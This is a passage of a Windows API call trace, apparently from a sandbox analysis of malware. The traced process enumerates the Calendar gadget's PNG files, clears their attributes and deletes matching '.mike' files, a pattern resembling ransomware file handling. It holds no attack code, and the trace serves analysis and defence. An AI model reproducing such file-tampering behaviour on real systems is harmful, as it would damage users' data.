ftLastWriteTime.dwLowDateTime=0x28396d47, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x12a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_single_bkg_orange.png", cAlternateFileName="")) returned 1 [0102.503] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82542ca0, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82542ca0, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x283bcea5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xaa6, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_single_orange.png", cAlternateFileName="")) returned 1 [0102.503] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82542ca0, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82542ca0, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x283e3003, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd6, dwReserved0=0x0, dwReserved1=0x0, cFileName="corner.png", cAlternateFileName="")) returned 1 [0102.503] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x824121b8, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x824121b8, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x283e3003, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x3f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="curl-hot.png", cAlternateFileName="")) returned 1 [0102.503] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82438315, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82438315, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28409161, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x380, dwReserved0=0x0, dwReserved1=0x0, cFileName="curl.png", cAlternateFileName="")) returned 1 [0102.504] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82438315, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82438315, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2842f2bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x96, dwReserved0=0x0, dwReserved1=0x0, cFileName="month.png", cAlternateFileName="")) returned 1 [0102.504] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82438315, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82438315, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2842f2bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1f6, dwReserved0=0x0, dwReserved1=0x0, cFileName="rings-desk.png", cAlternateFileName="")) returned 1 [0102.504] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8245e472, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8245e472, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2847b57b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x14e, dwReserved0=0x0, dwReserved1=0x0, cFileName="rings-dock.png", cAlternateFileName="")) returned 1 [0102.504] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0102.511] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.516] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png", dwFileAttributes=0x80) returned 0 [0102.517] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-desk.png.mike")) returned 1 [0102.520] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.526] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike", lpFilePart=0x0) returned 0x50 [0102.526] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike", lpFilePart=0x0) returned 0x50 [0102.527] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", dwFileAttributes=0x80) returned 0 [0102.528] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", lpFilePart=0x0) returned 0x4b [0102.528] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike", lpFilePart=0x0) returned 0x50 [0102.528] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike", lpFilePart=0x0) returned 0x50 [0102.528] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-dock.png.mike")) returned 1 [0102.532] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.533] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike", lpFilePart=0x0) returned 0x51 [0102.533] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", lpFilePart=0x0) returned 0x4c [0102.537] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike", lpFilePart=0x0) returned 0x51 [0102.537] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike", lpFilePart=0x0) returned 0x51 [0102.537] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", dwFileAttributes=0x80) returned 0 [0102.538] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", lpFilePart=0x0) returned 0x4c [0102.538] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike", lpFilePart=0x0) returned 0x51 [0102.539] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike", lpFilePart=0x0) returned 0x51 [0102.539] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-today.png.mike")) returned 1 [0102.542] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.542] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike", lpFilePart=0x0) returned 0x56 [0102.542] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", lpFilePart=0x0) returned 0x51 [0102.545] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike", lpFilePart=0x0) returned 0x56 [0102.546] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike", lpFilePart=0x0) returned 0x56 [0102.546] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", dwFileAttributes=0x80) returned 0 [0102.547] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", lpFilePart=0x0) returned 0x51 [0102.547] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike", lpFilePart=0x0) returned 0x56 [0102.547] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike", lpFilePart=0x0) returned 0x56 [0102.547] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-disable.png.mike")) returned 1 [0102.550] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.550] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.mike", lpFilePart=0x0) returned 0x53 [0102.550] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png", lpFilePart=0x0) returned 0x4e [0102.553] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.mike", lpFilePart=0x0) returned 0x53 [0102.554] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.mike", lpFilePart=0x0) returned 0x53 [0102.554] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png", dwFileAttributes=0x80) returned 0 [0102.555] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png", lpFilePart=0x0) returned 0x4e [0102.555] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.mike", lpFilePart=0x0) returned 0x53 [0102.555] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.mike", lpFilePart=0x0) returned 0x53 [0102.555] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-down.png.mike")) returned 1 [0102.558] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.559] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.mike", lpFilePart=0x0) returned 0x52 [0102.559] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png", lpFilePart=0x0) returned 0x4d [0102.562] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.mike", lpFilePart=0x0) returned 0x52 [0102.563] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.mike", lpFilePart=0x0) returned 0x52 [0102.563] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png", dwFileAttributes=0x80) returned 0 [0102.564] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png", lpFilePart=0x0) returned 0x4d [0102.564] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.mike", lpFilePart=0x0) returned 0x52 [0102.564] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.mike", lpFilePart=0x0) returned 0x52 [0102.564] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-hot.png.mike")) returned 1 [0102.567] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.567] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.mike", lpFilePart=0x0) returned 0x4e [0102.567] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png", lpFilePart=0x0) returned 0x49 [0102.570] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.mike", lpFilePart=0x0) returned 0x4e [0102.571] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.mike", lpFilePart=0x0) returned 0x4e [0102.571] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png", dwFileAttributes=0x80) returned 0 [0102.572] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png", lpFilePart=0x0) returned 0x49 [0102.572] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.mike", lpFilePart=0x0) returned 0x4e [0102.572] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.mike", lpFilePart=0x0) returned 0x4e [0102.572] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext.png.mike")) returned 1 [0102.575] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.576] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.mike", lpFilePart=0x0) returned 0x56 [0102.576] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png", lpFilePart=0x0) returned 0x51 [0102.579] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.mike", lpFilePart=0x0) returned 0x56 [0102.579] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.mike", lpFilePart=0x0) returned 0x56 [0102.579] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png", dwFileAttributes=0x80) returned 0 [0102.580] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png", lpFilePart=0x0) returned 0x51 [0102.581] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.mike", lpFilePart=0x0) returned 0x56 [0102.581] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.mike", lpFilePart=0x0) returned 0x56 [0102.581] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev-disable.png.mike")) returned 1 [0102.583] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.584] GetFullPathNameW (in: lpFileName="C:\\Program 